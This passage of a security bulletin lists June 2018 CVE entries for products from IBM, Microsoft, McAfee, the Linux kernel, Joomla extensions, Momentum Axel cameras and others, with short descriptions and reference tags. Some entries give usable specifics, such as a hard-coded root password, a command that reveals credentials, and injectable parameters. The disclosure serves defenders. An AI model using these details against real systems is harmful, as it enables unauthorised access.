A vulnerability in GSKit affects IBM Spectrum Scale 4.1.1, 4.2.0, 4.2.1, 4.2.3, and 5.0.0 that could allow a local attacker to obtain control of the Spectrum Scale daemon and to access and modify files in the Spectrum Scale file system, and possibly to obtain administrator privileges on the node. IBM X-Force ID: 139240.2018-06-13not yet calculatedCVE-2018-1431
CONFIRM
XF
ibm -- websphere_mqIBM WebSphere MQ 8.0 and 9.0, when configured to use a PAM module for authentication, could allow a user to cause a deadlock in the IBM MQ PAM code which could result in a denial of service. IBM X-Force ID: 138949.2018-06-15not yet calculatedCVE-2018-1419
CONFIRM
XF
icehrm -- icehrm
 
IceHrm before 23.0.1.OS has a risky usage of a hashed password in a request.2018-06-14not yet calculatedCVE-2018-12420
CONFIRM
CONFIRM
icms -- icms
 
spider.admincp.php in iCMS v7.0.8 has SQL Injection via the id parameter in an app=spider&do=batch request to admincp.php.2018-06-15not yet calculatedCVE-2018-12498
MISC
ignite – realtime_openfire
 
Ignite Realtime Openfire 3.7.1 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.2018-06-13not yet calculatedCVE-2018-11688
MISC
FULLDISC
BUGTRAQ
java_melody -- java_melody
 
JavaMelody through 1.60.0 has XSS via the counter parameter in a clear_counter action to the /monitoring URI.2018-06-14not yet calculatedCVE-2018-12432
MISC
joomla! -- joomla!
 
router.php in the Harmis Ek rishta (aka ek-rishta) 2.10 component for Joomla! allows SQL Injection via the PATH_INFO to a home/requested_user/Sent%20interest/ URI.2018-06-12not yet calculatedCVE-2018-12254
MISC
EXPLOIT-DB
joomla! -- joomla!
 
The Balbooa Gridbox extension version 2.4.0 and previous versions for Joomla! is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.2018-06-14not yet calculatedCVE-2018-11690
MISC
BUGTRAQ

jtdowney -- private_address_check


 
private_address_check ruby gem before 0.5.0 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition due to the address the socket uses not being checked. DNS entries with a TTL of 0 can trigger this case where the initial resolution is a public address but the subsequent resolution is a private address.2018-06-13not yet calculatedCVE-2018-3759
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows XSS via the name field to the "Business Model's Catalogue" catalogue.2018-06-13not yet calculatedCVE-2018-12353
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows CSRF via every form, as demonstrated by a /knowage/restful-services/2.0/analyticalDrivers/ POST request.2018-06-13not yet calculatedCVE-2018-12354
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows XSS via the name or description field to the "Olap Schemas' Catalogue" catalogue.2018-06-13not yet calculatedCVE-2018-12355
MISC
lams -- lams
 
There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.2018-06-11not yet calculatedCVE-2018-12090
CONFIRM
libavcodec -- libavcodec
 
The restore_tqb_pixels function in hevc_filter.c in libavcodec, as used in libbpg 0.9.8 and other products, has an integer overflow that leads to a heap-based buffer overflow and remote code execution.2018-06-15not yet calculatedCVE-2018-12447
MISC
MISC
libgcrypt -- libgcrypt
 
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-13not yet calculatedCVE-2018-0495
MISC
MISC
MISC
MISC
libmagic.a -- libmagic.a
 
The do_core_note function in readelf.c in libmagic.a in file 5.33 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted ELF file.2018-06-11not yet calculatedCVE-2018-10360
CONFIRM
UBUNTU
libressl -- libressl
 
LibreSSL before 2.6.5 and 2.7.x before 2.7.4 allows a memory-cache side-channel attack on DSA and ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover a key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12434
MISC
MISC
MISC
libtomcrypt -- libtomcrypt
 
LibTomCrypt through 1.18.1 allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12437
MISC
linux -- linux_kernel
 
In the Linux Kernel before version 4.15.8, 4.14.25, 4.9.87, 4.4.121, 4.1.51, and 3.2.102, an error in the "_sctp_make_chunk()" function (net/sctp/sm_make_chunk.c) when handling SCTP packets length can be exploited to cause a kernel crash.2018-06-12not yet calculatedCVE-2018-5803
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
MLIST
SECUNIA
MISC
UBUNTU
UBUNTU
UBUNTU
DEBIAN
DEBIAN
MLIST
MLIST
linux -- linux_kernel
 
In the ea_get function in fs/jfs/xattr.c in the Linux kernel through 4.17.1, a memory corruption bug in JFS can be triggered by calling setxattr twice with two different extended attribute names on the same file. This vulnerability can be triggered by an unprivileged user with the ability to create files and execute programs. A kmalloc call is incorrect, leading to slab-out-of-bounds in jfs_xattr.2018-06-12not yet calculatedCVE-2018-12233
BID
MISC
MISC
linux -- linux_kernel
 
In net/socket.c in the Linux kernel through 4.17.1, there is a race condition between fchownat and close in cases where they target the same socket file descriptor, related to the sock_close and sockfs_setattr functions. fchownat does not increment the file descriptor reference count, which allows close to set the socket to NULL during fchownat's execution, leading to a NULL pointer dereference and system crash.2018-06-12not yet calculatedCVE-2018-12232
MISC
BID
MISC
MISC
MISC
linux -- linux_kernel
 
In the Linux Kernel before version 4.16.11, 4.14.43, 4.9.102, and 4.4.133, multiple race condition errors when handling probe, disconnect, and rebind operations can be exploited to trigger a use-after-free condition or a NULL pointer dereference by sending multiple USB over IP packets.2018-06-12not yet calculatedCVE-2018-5814
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
SECUNIA
MISC
little_snitch -- little_snitch
 
Little Snitch versions 4.0 to 4.0.6 use the SecStaticCodeCheckValidityWithErrors() function without the kSecCSCheckAllArchitectures flag and therefore do not validate all architectures stored in a fat binary. An attacker can maliciously craft a fat binary containing multiple architectures that may cause a situation where Little Snitch treats the running process as having no code signature at all while erroneously indicating that the binary on disk does have a valid code signature. This could lead to users being confused about whether or not the code signature is valid.2018-06-12not yet calculatedCVE-2018-10470
CONFIRM
MISC
ltb -- ltb_self_service_password
 
LTB (aka LDAP Tool Box) Self Service Password before 1.3 allows a change to a user password (without knowing the old password) via a crafted POST request, because the ldap_bind return value is mishandled and the PHP data type is not constrained to be a string.2018-06-14not yet calculatedCVE-2018-12421
MISC
MISC
MISC
maccms -- maccms
 
Maccms 10 allows CSRF via admin.php/admin/admin/info.html to add user accounts.2018-06-14not yet calculatedCVE-2018-12114
MISC
MISC
EXPLOIT-DB
matrix-org -- synapse
 
The on_get_missing_events function in handlers/federation.py in Matrix Synapse before 0.31.1 has a security bug in the get_missing_events federation API where event visibility rules were not applied correctly.2018-06-13not yet calculatedCVE-2018-12291
CONFIRM
CONFIRM
matrix-org -- synapse
 
In Synapse before 0.31.2, unauthorised users can hijack rooms when there is no m.room.power_levels event in force.2018-06-14not yet calculatedCVE-2018-12423
MISC
MISC
MISC
matrixssl -- matrixssl
 
MatrixSSL through 3.9.5 Open allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12439
MISC
mcafee -- epolicy_orchestrator
 
Information disclosure vulnerability in McAfee ePolicy Orchestrator (ePO) 5.3.0 through 5.3.3 and 5.9.0 through 5.9.1 allows authenticated users to view sensitive information in plain text format via unspecified vectors.2018-06-15not yet calculatedCVE-2018-6672
CONFIRM
mcafee -- epolicy_orchestrator
 
OS Command Injection vulnerability in McAfee ePolicy Orchestrator (ePO) 5.9.0, 5.3.2, 5.3.1, 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows attackers to run arbitrary OS commands with limited privileges via not sanitizing the user input data before exporting it into a CSV format output.2018-06-13not yet calculatedCVE-2017-3936
BID
CONFIRM
mcafee -- epolicy_orchestrator
 
Application Protection Bypass vulnerability in McAfee ePolicy Orchestrator (ePO) 5.3.0 through 5.3.3 and 5.9.0 through 5.9.1 allows remote authenticated users to bypass localhost only access security protection for some ePO features via a specially crafted HTTP request.2018-06-15not yet calculatedCVE-2018-6671
CONFIRM
mcafee -- network_security_management
 
Password recovery exploitation vulnerability in the non-certificate-based authentication mechanism in McAfee Network Security Management (NSM) before 8.2.7.42.2 allows attackers to crack user passwords via unsalted hashes.2018-06-12not yet calculatedCVE-2017-3962
CONFIRM
mcafee -- network_security_management
 
Exploitation of Authorization vulnerability in the web interface in McAfee Network Security Management (NSM) before 8.2.7.42.2 allows authenticated users to gain elevated privileges via a crafted HTTP request parameter.2018-06-12not yet calculatedCVE-2017-3960
CONFIRM
mcafee -- network_security_management
 
Session fixation vulnerability in the web interface in McAfee Network Security Manager (NSM) before 8.2.7.42.2 and McAfee Network Data Loss Prevention (NDLP) before 9.3.4.1.5 allows remote attackers to disclose sensitive information or manipulate the database via a crafted authentication cookie.2018-06-13not yet calculatedCVE-2017-3968
CONFIRM
CONFIRM
mcafee -- threat_intelligence_exchange
 
Code Injection vulnerability in the ePolicy Orchestrator (ePO) extension in McAfee Threat Intelligence Exchange (TIE) Server 2.1.0 and earlier allows remote attackers to execute arbitrary HTML code to be reflected in the response web page via unspecified vector.2018-06-13not yet calculatedCVE-2017-3907
CONFIRM
md4c -- md4c
 
md_build_attribute in md4c.c in md4c 0.2.6 allows remote attackers to cause a denial of service (Segmentation fault and application crash) or possibly have unspecified other impact via a crafted file.2018-06-11not yet calculatedCVE-2018-12112
MISC
md4c -- md4c
 
md4c 0.2.6 has a NULL pointer dereference in the function md_process_line in md4c.c, related to ctx->current_block.2018-06-11not yet calculatedCVE-2018-12102
MISC
MISC
microsoft -- chakracore
 
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability." This affects ChakraCore. This CVE ID is unique from CVE-2018-8267.2018-06-14not yet calculatedCVE-2018-8243
BID
CONFIRM
microsoft -- edgeAn information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-0871.2018-06-14not yet calculatedCVE-2018-8234
BID
SECTRACK
CONFIRM
microsoft -- edge_and_chakracoreA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8227.2018-06-14not yet calculatedCVE-2018-8229
BID
SECTRACK
CONFIRM
microsoft -- edge_and_chakracore
 
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8229.2018-06-14not yet calculatedCVE-2018-8227
BID
SECTRACK
CONFIRM
microsoft -- edge
 
An information disclosure vulnerability exists when Edge improperly marks files, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8234.2018-06-14not yet calculatedCVE-2018-0871
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8111, CVE-2018-8236.2018-06-14not yet calculatedCVE-2018-8110
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8110, CVE-2018-8236.2018-06-14not yet calculatedCVE-2018-8111
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8110, CVE-2018-8111.2018-06-14not yet calculatedCVE-2018-8236
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins, aka "Microsoft Edge Security Feature Bypass Vulnerability." This affects Microsoft Edge.2018-06-14not yet calculatedCVE-2018-8235
BID
SECTRACK
CONFIRM
microsoft -- internet_explorerA security feature bypass vulnerability exists in Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW), aka "Internet Explorer Security Feature Bypass Vulnerability." This affects Internet Explorer 11.2018-06-14not yet calculatedCVE-2018-8113
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8249.2018-06-14not yet calculatedCVE-2018-0978
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8243.2018-06-14not yet calculatedCVE-2018-8267
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11. This CVE ID is unique from CVE-2018-0978.2018-06-14not yet calculatedCVE-2018-8249
BID
SECTRACK
CONFIRM
microsoft -- multiple_productsAn information disclosure vulnerability exists when Microsoft Excel improperly discloses the contents of its memory, aka "Microsoft Excel Information Disclosure Vulnerability." This affects Microsoft Excel Viewer, Microsoft Office, Microsoft Excel.2018-06-14not yet calculatedCVE-2018-8246
BID
SECTRACK
CONFIRM
microsoft -- office_and_office_online_server
 
An elevation of privilege vulnerability exists when Office Web Apps Server 2013 and Office Online Server fail to properly handle web requests, aka "Microsoft Office Elevation of Privilege Vulnerability." This affects Microsoft Office, Microsoft Office Online Server. This CVE ID is unique from CVE-2018-8245.2018-06-14not yet calculatedCVE-2018-8247
BID
SECTRACK
CONFIRM
microsoft -- office_and_outlook
 
An elevation of privilege vulnerability exists when Microsoft Outlook does not validate attachment headers properly, aka "Microsoft Outlook Elevation of Privilege Vulnerability." This affects Microsoft Office, Microsoft Outlook.2018-06-14not yet calculatedCVE-2018-8244
BID
SECTRACK
CONFIRM
microsoft -- office
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Office.2018-06-14not yet calculatedCVE-2018-8248
BID
SECTRACK
CONFIRM
microsoft -- publisher
 
An elevation of privilege vulnerability exists when Microsoft Publisher fails to utilize features that lock down the Local Machine zone when instantiating OLE objects, aka "Microsoft Office Elevation of Privilege Vulnerability." This affects Microsoft Publisher. This CVE ID is unique from CVE-2018-8247.2018-06-14not yet calculatedCVE-2018-8245
BID
SECTRACK
CONFIRM
microsoft -- sharepoint
 
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint. This CVE ID is unique from CVE-2018-8254.2018-06-14not yet calculatedCVE-2018-8252
BID
SECTRACK
CONFIRM
microsoft -- sharepoint
 
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft Project Server, Microsoft SharePoint. This CVE ID is unique from CVE-2018-8252.2018-06-14not yet calculatedCVE-2018-8254
BID
SECTRACK
CONFIRM
microsoft -- windowsA remote code execution vulnerability exists when HTTP Protocol Stack (Http.sys) improperly handles objects in memory, aka "HTTP Protocol Stack Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8231
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists in the way that the Windows Kernel API enforces permissions, aka "Windows Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-0982
BID
SECTRACK
CONFIRM
EXPLOIT-DB
microsoft -- windows
 
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8214.2018-06-14not yet calculatedCVE-2018-8208
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka "Windows Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8210.2018-06-14not yet calculatedCVE-2018-8213
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows Server 2008, Windows 7, Windows Server 2008 R2.2018-06-14not yet calculatedCVE-2018-8224
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8216
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels, aka "Hypervisor Code Integrity Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8219
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka "Windows GDI Information Disclosure Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8239
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8201
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8212
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when Windows allows a normal user to access the Wireless LAN profile of an administrative user, aka "Windows Wireless Network Profile Information Disclosure Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8209
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when the (Human Interface Device) HID Parser Library driver improperly handles objects in memory, aka "HIDParser Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8169
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows 10 Servers, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8211
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8215
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when NTFS improperly checks access, aka "NTFS Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-1036
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists in the HTTP 2.0 protocol stack (HTTP.sys) when HTTP.sys improperly parses specially crafted HTTP 2.0 requests, aka "HTTP.sys Denial of Service Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8226
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8121.2018-06-14not yet calculatedCVE-2018-8207
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists in the way that the Windows Code Integrity Module performs hashing, aka "Windows Code Integrity Module Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-1040
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8217
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists in Windows Domain Name System (DNS) DNSAPI.dll when it fails to properly handle DNS responses, aka "Windows DNSAPI Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8225
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system, aka "Windows Hyper-V Denial of Service Vulnerability." This affects Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8218
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217.2018-06-14not yet calculatedCVE-2018-8221
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An denial of service vulnerability exists when Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory, aka "WEBDAV Denial of Service Vulnerability." This affects Windows 10 Servers, Windows 10.2018-06-14not yet calculatedCVE-2018-8175
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka "Windows Remote Code Execution Vulnerability." This affects Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows Server 2016, Windows 8.1, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8213.2018-06-14not yet calculatedCVE-2018-8210
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An Elevation of Privilege vulnerability exists when Cortana retrieves data from user input services without consideration for status, aka "Cortana Elevation of Privilege Vulnerability." This affects Windows 10 Servers, Windows 10.2018-06-14not yet calculatedCVE-2018-8140
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8208.2018-06-14not yet calculatedCVE-2018-8214
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 10 Servers, Windows 10. This CVE ID is unique from CVE-2018-8207.2018-06-14not yet calculatedCVE-2018-8121
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists when Windows improperly handles objects in memory, aka "Windows Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8205
BID
SECTRACK
CONFIRM
midnight_coders -- weborb_for_java
 
The Java implementations of AMF3 deserializers in WebORB for Java by Midnight Coders, version 5.1.1.0, derive class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.2018-06-11not yet calculatedCVE-2017-3207
BID
MISC
MISC
CERT-VN
midnight_coders -- weborb_for_java
 
The Java implementation of AMF3 deserializers used by WebORB for Java by Midnight Coders, version 5.1.1.0, allows external entity references (XXEs) from XML documents embedded within AMF3 messages. If the XML parsing is handled incorrectly it could potentially expose sensitive data on the server, denial of service, or server side request forgery.2018-06-11not yet calculatedCVE-2017-3208
BID
MISC
MISC
CERT-VN
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. There is Authenticated Custom Firmware Upgrade via DNS Hijacking. An authenticated root user with CLI access is able to remotely upgrade firmware to a custom image due to lack of SSL validation by changing the nameservers in /etc/resolv.conf to the attacker's server, and serving the expected HTTPS response containing new firmware for the device to download.2018-06-12not yet calculatedCVE-2018-12257
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. Root access can be obtained via UART pins without any restrictions, which leads to full system compromise.2018-06-12not yet calculatedCVE-2018-12259
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. A password of EHLGVG is hard-coded for the root and admin accounts, which makes it easier for physically proximate attackers to login at the console.2018-06-13not yet calculatedCVE-2018-12323
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. The root password can be obtained in cleartext by issuing the command 'showKey' from the root CLI. This password may be the same on all devices2018-06-12not yet calculatedCVE-2018-12260
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. Custom Firmware Upgrade is possible via an SD Card. With physical access, an attacker can upgrade the firmware in under 60 seconds by inserting an SD card containing the firmware with name 'ezviz.dav' and rebooting.2018-06-12not yet calculatedCVE-2018-12258
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. All processes run as root.2018-06-12not yet calculatedCVE-2018-12261
MISC
mozilla -- firefoxThe screenshot images displayed in the Activity Stream page displayed when a new tab is opened is created from the meta tags of websites. An issue was discovered where the page could attempt to create these images through "file:" URLs from the local file system. This loading is blocked by the sandbox but could expose local data if combined with another attack that escapes sandbox protections. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5118
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefoxA legacy extension's non-contentaccessible, defined resources can be loaded by an arbitrary web page through script. This script does this by using a maliciously crafted path string to reference the resources. Note: this vulnerability does not affect WebExtensions. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5137
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
